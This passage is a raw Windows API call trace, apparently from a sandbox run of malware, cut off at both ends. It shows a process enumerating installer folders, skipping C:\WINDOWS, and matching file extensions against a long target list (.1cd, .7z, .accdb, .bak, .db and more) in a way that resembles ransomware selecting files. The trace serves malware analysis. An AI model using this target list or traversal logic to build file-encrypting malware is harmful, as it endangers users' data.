lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604578 [0196.052] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.052] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.052] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.053] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.053] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.053] FindClose (in: hFindFile=0x604578 | out: hFindFile=0x604578) returned 1 [0196.053] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.053] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0196.053] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604938 [0196.056] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.056] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.056] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.057] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.057] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.061] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0196.061] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.061] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0196.062] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0196.062] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.062] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0196.062] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0196.062] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0196.062] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0196.062] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.062] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0196.063] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0196.063] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Extended", cAlternateFileName="")) returned 1 [0196.063] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604938 [0196.063] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.063] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0196.063] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0196.064] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0196.064] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0196.064] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.064] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0196.064] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics") returned 30 [0196.064] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\Graphics") returned 1 [0196.064] lstrlenW (lpString="Graphics") returned 8 [0196.064] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Graphics") returned -1 [0196.064] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3f91248 [0196.064] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics") returned 30 [0196.064] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604938 [0196.067] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.067] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0196.067] lstrlenW (lpString="Print.ico") returned 9 [0196.067] lstrlenW (lpString=".1cd") returned 4 [0196.067] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0196.067] lstrlenW (lpString=".3ds") returned 4 [0196.067] lstrcmpiW (lpString1=".3ds", lpString2=".ico") returned -1 [0196.067] lstrlenW (lpString=".3fr") returned 4 [0196.067] lstrcmpiW (lpString1=".3fr", lpString2=".ico") returned -1 [0196.067] lstrlenW (lpString=".3g2") returned 4 [0196.067] lstrcmpiW (lpString1=".3g2", lpString2=".ico") returned -1 [0196.067] lstrlenW (lpString=".3gp") returned 4 [0196.067] lstrcmpiW (lpString1=".3gp", lpString2=".ico") returned -1 [0196.067] lstrlenW (lpString=".7z") returned 3 [0196.067] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0196.067] lstrlenW (lpString=".accda") returned 6 [0196.068] lstrcmpiW (lpString1=".accda", lpString2="nt.ico") returned -1 [0196.068] lstrlenW (lpString=".accdb") returned 6 [0196.068] lstrcmpiW (lpString1=".accdb", lpString2="nt.ico") returned -1 [0196.068] lstrlenW (lpString=".accdc") returned 6 [0196.068] lstrcmpiW (lpString1=".accdc", lpString2="nt.ico") returned -1 [0196.068] lstrlenW (lpString=".accde") returned 6 [0196.068] lstrcmpiW (lpString1=".accde", lpString2="nt.ico") returned -1 [0196.068] lstrlenW (lpString=".accdt") returned 6 [0196.068] lstrcmpiW (lpString1=".accdt", lpString2="nt.ico") returned -1 [0196.068] lstrlenW (lpString=".accdw") returned 6 [0196.068] lstrcmpiW (lpString1=".accdw", lpString2="nt.ico") returned -1 [0196.068] lstrlenW (lpString=".adb") returned 4 [0196.068] lstrcmpiW (lpString1=".adb", lpString2=".ico") returned -1 [0196.068] lstrlenW (lpString=".adp") returned 4 [0196.068] lstrcmpiW (lpString1=".adp", lpString2=".ico") returned -1 [0196.068] lstrlenW (lpString=".ai") returned 3 [0196.068] lstrcmpiW (lpString1=".ai", lpString2="ico") returned -1 [0196.068] lstrlenW (lpString=".ai3") returned 4 [0196.068] lstrcmpiW (lpString1=".ai3", lpString2=".ico") returned -1 [0196.068] lstrlenW (lpString=".ai4") returned 4 [0196.068] lstrcmpiW (lpString1=".ai4", lpString2=".ico") returned -1 [0196.068] lstrlenW (lpString=".ai5") returned 4 [0196.068] lstrcmpiW (lpString1=".ai5", lpString2=".ico") returned -1 [0196.069] lstrlenW (lpString=".ai6") returned 4 [0196.069] lstrcmpiW (lpString1=".ai6", lpString2=".ico") returned -1 [0196.069] lstrlenW (lpString=".ai7") returned 4 [0196.069] lstrcmpiW (lpString1=".ai7", lpString2=".ico") returned -1 [0196.069] lstrlenW (lpString=".ai8") returned 4 [0196.069] lstrcmpiW (lpString1=".ai8", lpString2=".ico") returned -1 [0196.069] lstrlenW (lpString=".anim") returned 5 [0196.069] lstrcmpiW (lpString1=".anim", lpString2="t.ico") returned -1 [0196.069] lstrlenW (lpString=".arw") returned 4 [0196.069] lstrcmpiW (lpString1=".arw", lpString2=".ico") returned -1 [0196.069] lstrlenW (lpString=".as") returned 3 [0196.069] lstrcmpiW (lpString1=".as", lpString2="ico") returned -1 [0196.069] lstrlenW (lpString=".asa") returned 4 [0196.069] lstrcmpiW (lpString1=".asa", lpString2=".ico") returned -1 [0196.069] lstrlenW (lpString=".asc") returned 4 [0196.070] lstrcmpiW (lpString1=".asc", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".ascx") returned 5 [0196.070] lstrcmpiW (lpString1=".ascx", lpString2="t.ico") returned -1 [0196.070] lstrlenW (lpString=".asm") returned 4 [0196.070] lstrcmpiW (lpString1=".asm", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".asmx") returned 5 [0196.070] lstrcmpiW (lpString1=".asmx", lpString2="t.ico") returned -1 [0196.070] lstrlenW (lpString=".asp") returned 4 [0196.070] lstrcmpiW (lpString1=".asp", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".aspx") returned 5 [0196.070] lstrcmpiW (lpString1=".aspx", lpString2="t.ico") returned -1 [0196.070] lstrlenW (lpString=".asr") returned 4 [0196.070] lstrcmpiW (lpString1=".asr", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".asx") returned 4 [0196.070] lstrcmpiW (lpString1=".asx", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".avi") returned 4 [0196.070] lstrcmpiW (lpString1=".avi", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".avs") returned 4 [0196.070] lstrcmpiW (lpString1=".avs", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".backup") returned 7 [0196.070] lstrcmpiW (lpString1=".backup", lpString2="int.ico") returned -1 [0196.070] lstrlenW (lpString=".bak") returned 4 [0196.070] lstrcmpiW (lpString1=".bak", lpString2=".ico") returned -1 [0196.070] lstrlenW (lpString=".bay") returned 4 [0196.071] lstrcmpiW (lpString1=".bay", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".bd") returned 3 [0196.071] lstrcmpiW (lpString1=".bd", lpString2="ico") returned -1 [0196.071] lstrlenW (lpString=".bin") returned 4 [0196.071] lstrcmpiW (lpString1=".bin", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".bmp") returned 4 [0196.071] lstrcmpiW (lpString1=".bmp", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".bz2") returned 4 [0196.071] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".c") returned 2 [0196.071] lstrcmpiW (lpString1=".c", lpString2="co") returned -1 [0196.071] lstrlenW (lpString=".cdr") returned 4 [0196.071] lstrcmpiW (lpString1=".cdr", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".cer") returned 4 [0196.071] lstrcmpiW (lpString1=".cer", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".cf") returned 3 [0196.071] lstrcmpiW (lpString1=".cf", lpString2="ico") returned -1 [0196.071] lstrlenW (lpString=".cfc") returned 4 [0196.071] lstrcmpiW (lpString1=".cfc", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".cfm") returned 4 [0196.071] lstrcmpiW (lpString1=".cfm", lpString2=".ico") returned -1 [0196.071] lstrlenW (lpString=".cfml") returned 5 [0196.071] lstrcmpiW (lpString1=".cfml", lpString2="t.ico") returned -1 [0196.072] lstrlenW (lpString=".cfu") returned 4 [0196.072] lstrcmpiW (lpString1=".cfu", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".chm") returned 4 [0196.072] lstrcmpiW (lpString1=".chm", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".cin") returned 4 [0196.072] lstrcmpiW (lpString1=".cin", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".class") returned 6 [0196.072] lstrcmpiW (lpString1=".class", lpString2="nt.ico") returned -1 [0196.072] lstrlenW (lpString=".clx") returned 4 [0196.072] lstrcmpiW (lpString1=".clx", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".config") returned 7 [0196.072] lstrcmpiW (lpString1=".config", lpString2="int.ico") returned -1 [0196.072] lstrlenW (lpString=".cpp") returned 4 [0196.072] lstrcmpiW (lpString1=".cpp", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".cr2") returned 4 [0196.072] lstrcmpiW (lpString1=".cr2", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".crt") returned 4 [0196.072] lstrcmpiW (lpString1=".crt", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".crw") returned 4 [0196.072] lstrcmpiW (lpString1=".crw", lpString2=".ico") returned -1 [0196.072] lstrlenW (lpString=".cs") returned 3 [0196.072] lstrcmpiW (lpString1=".cs", lpString2="ico") returned -1 [0196.072] lstrlenW (lpString=".css") returned 4 [0196.072] lstrcmpiW (lpString1=".css", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".csv") returned 4 [0196.073] lstrcmpiW (lpString1=".csv", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".cub") returned 4 [0196.073] lstrcmpiW (lpString1=".cub", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dae") returned 4 [0196.073] lstrcmpiW (lpString1=".dae", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dat") returned 4 [0196.073] lstrcmpiW (lpString1=".dat", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".db") returned 3 [0196.073] lstrcmpiW (lpString1=".db", lpString2="ico") returned -1 [0196.073] lstrlenW (lpString=".dbf") returned 4 